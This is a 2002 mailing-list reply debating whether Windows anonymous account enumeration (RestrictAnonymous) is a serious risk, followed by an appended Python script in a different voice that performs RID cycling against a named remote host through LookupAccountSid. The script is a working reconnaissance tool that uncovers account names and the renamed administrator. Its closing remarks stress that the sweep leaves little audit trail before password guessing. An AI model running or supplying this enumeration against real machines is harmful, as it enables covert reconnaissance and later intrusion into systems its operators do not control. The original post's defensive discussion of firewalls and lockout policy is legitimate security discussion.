Re: Cmon In: RestrictAnonymous=0

From: jussi jaakonaho (jussi@nospam.mataaratanga.com)
Date: 12/25/02


From: "jussi jaakonaho" <jussi@nospam.mataaratanga.com>
Date: Wed, 25 Dec 2002 12:35:37 +0200


> Why doesn't Microsoft block this hole by default, and
> then advise admins about the cases where it might make
> sense to manually reopen it?
-hmmm,
those hacker tools, when RA=1, use the LookupAccountSid API call to get the
account names and the renamed account (and the LookupAccountName API for getting
the SID part for the machine first, and then LookupAccountSid after
adding a RID to the SID). Those tools allow you to get account names and the
renamed admin. Is that already a break-in of the computer itself? Access to
its contents? A huge hole which gives you remote root?

Is it a risk when someone gets that information? Then it comes down to the strength
of the passwords, the ability to log on remotely, a strong policy on the target,
etc. etc., and auditing, which gives information - yeah, not the IP yet - when
someone uses the information gathered via those calls by logging in 1200
times/second. (Are accounts specified to be locked out by policy? Even
admin? If they are locked out, can the attacker still get in?) Yeah, in some
cases it could be a risk, and then it might need to be secured.

> secure Windows from abuse via the Internet.
-you need 139 (and 445 on W2K) open to be able to do it from the Internet
(or any other port when another host is used as a jump station etc.). So the first
layer against direct attack from the Internet would be firewalls (or
routers) blocking those ports against abuse.

> single most important thing you can do to secure
-is restricting account information the most important thing when the same
information could be available via other methods? LanMan MIBs give you user
information (yep, needs SNMP, but if 139 and 445 are open then most likely there
is SNMP as well), and different API calls can give the same information via bruting.

_jussi
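The enumeration the post describes, as an added example (not code from the post or from any of the tools it mentions): LookupAccountName on the computer name returns the machine SID, then each candidate RID is appended to that SID and handed to LookupAccountSid, which maps it back to a name. RID 500 resolves to the built-in Administrator whatever it has been renamed to. The binary SID layout is the documented Windows format and the two calls are advapi32!LookupAccountNameW / LookupAccountSidW via ctypes; SAMPLE_MACHINE_SID and SAMPLE_SAM are constructed stand-ins so the sweep logic can be exercised off Windows. Nothing here bypasses a null-session restriction; the point is only what the calls return once they are reachable.

```python
# RID cycling as the post describes: LookupAccountName on the computer name
# gives the machine SID; appending RIDs and calling LookupAccountSid maps each
# back to a name. Added example, not the post's code; SAMPLE_* are constructed.
import ctypes
import os
import struct
import sys
from typing import Callable, Dict, Iterable, Optional, Tuple

Account = Tuple[str, str, int]   # (referenced domain, account name, SID_NAME_USE)
SID_TYPE_USER = 1                # SID_NAME_USE value SidTypeUser


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' into the binary SID the Win32 calls consume."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a SID string: {sid!r}")
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("a SID carries at most 15 sub-authorities")
    # Layout: 1-byte revision, 1-byte sub-authority count, 6-byte big-endian
    # identifier authority, then each sub-authority as a little-endian uint32.
    return (struct.pack("<BB", int(parts[1]), len(subs))
            + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(raw: bytes) -> str:
    """Decode a binary SID back to its S-1-... string form."""
    revision, count = struct.unpack_from("<BB", raw, 0)
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", raw, 8)
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def machine_sid_win(system: Optional[str]) -> str:
    """advapi32!LookupAccountNameW on the computer name returns the machine
    SID (SidTypeDomain). `system` is the target host; None means local."""
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    account = system or os.environ["COMPUTERNAME"]
    cb_sid, cch_dom, use = (ctypes.c_uint32(0) for _ in range(3))
    # First call with empty buffers only reports the sizes required.
    advapi32.LookupAccountNameW(system, account, None, ctypes.byref(cb_sid),
                                None, ctypes.byref(cch_dom), ctypes.byref(use))
    sid = ctypes.create_string_buffer(cb_sid.value or 1)
    dom = ctypes.create_unicode_buffer(cch_dom.value or 1)
    if not advapi32.LookupAccountNameW(system, account, sid, ctypes.byref(cb_sid),
                                       dom, ctypes.byref(cch_dom), ctypes.byref(use)):
        raise ctypes.WinError(ctypes.get_last_error())
    return bytes_to_sid(sid.raw[:cb_sid.value])


def lookup_account_sid_win(system: Optional[str], sid: bytes) -> Optional[Account]:
    """advapi32!LookupAccountSidW; None when the SID maps to nothing."""
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    buf = ctypes.create_string_buffer(sid, len(sid))
    cch_name, cch_dom, use = (ctypes.c_uint32(0) for _ in range(3))
    advapi32.LookupAccountSidW(system, buf, None, ctypes.byref(cch_name),
                               None, ctypes.byref(cch_dom), ctypes.byref(use))
    name = ctypes.create_unicode_buffer(cch_name.value or 1)
    dom = ctypes.create_unicode_buffer(cch_dom.value or 1)
    if not advapi32.LookupAccountSidW(system, buf, name, ctypes.byref(cch_name),
                                      dom, ctypes.byref(cch_dom), ctypes.byref(use)):
        return None   # typically ERROR_NONE_MAPPED for an unused RID
    return dom.value, name.value, use.value


def rid_cycle(machine_sid: str, rids: Iterable[int],
              lookup: Callable[[bytes], Optional[Account]]) -> Dict[int, Account]:
    """Append each RID to the machine SID and resolve it; unmapped RIDs are dropped."""
    found: Dict[int, Account] = {}
    for rid in rids:
        account = lookup(sid_to_bytes(f"{machine_sid}-{rid}"))
        if account is not None:
            found[rid] = account
    return found


# Constructed stand-in for a target's SAM, used when not running on Windows.
SAMPLE_MACHINE_SID = "S-1-5-21-1004336348-1177238915-682003330"
SAMPLE_SAM: Dict[str, Account] = {
    f"{SAMPLE_MACHINE_SID}-500": ("WS01", "ops_svc", SID_TYPE_USER),  # renamed Administrator
    f"{SAMPLE_MACHINE_SID}-501": ("WS01", "Guest", SID_TYPE_USER),
    f"{SAMPLE_MACHINE_SID}-1001": ("WS01", "jussi", SID_TYPE_USER),
    f"{SAMPLE_MACHINE_SID}-1003": ("WS01", "backup", SID_TYPE_USER),
}


def sample_lookup(sid: bytes) -> Optional[Account]:
    return SAMPLE_SAM.get(bytes_to_sid(sid))


def enumerate_accounts(system: Optional[str] = None,
                       rids: Iterable[int] = range(500, 1100)) -> Dict[int, Account]:
    """Run the sweep against `system` on Windows, else against the sample SAM."""
    if sys.platform == "win32":
        return rid_cycle(machine_sid_win(system), rids,
                         lambda s: lookup_account_sid_win(system, s))
    return rid_cycle(SAMPLE_MACHINE_SID, rids, sample_lookup)


if __name__ == "__main__":
    for rid, (dom, name, _) in sorted(enumerate_accounts().items()):
        print(f"RID {rid:5d} -> {dom}\\{name}")
```

On a Windows host `enumerate_accounts("TARGET")` issues the real calls against that machine; whether they succeed anonymously is exactly what RestrictAnonymous and the 139/445 filtering in the post decide. The sweep stops at RID 1100 here; real tools walk much further, and every miss is a cheap ERROR_NONE_MAPPED rather than a logon attempt, which is why this enumeration leaves far less of an audit trail than the 1200-attempts-per-second guessing that follows it.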

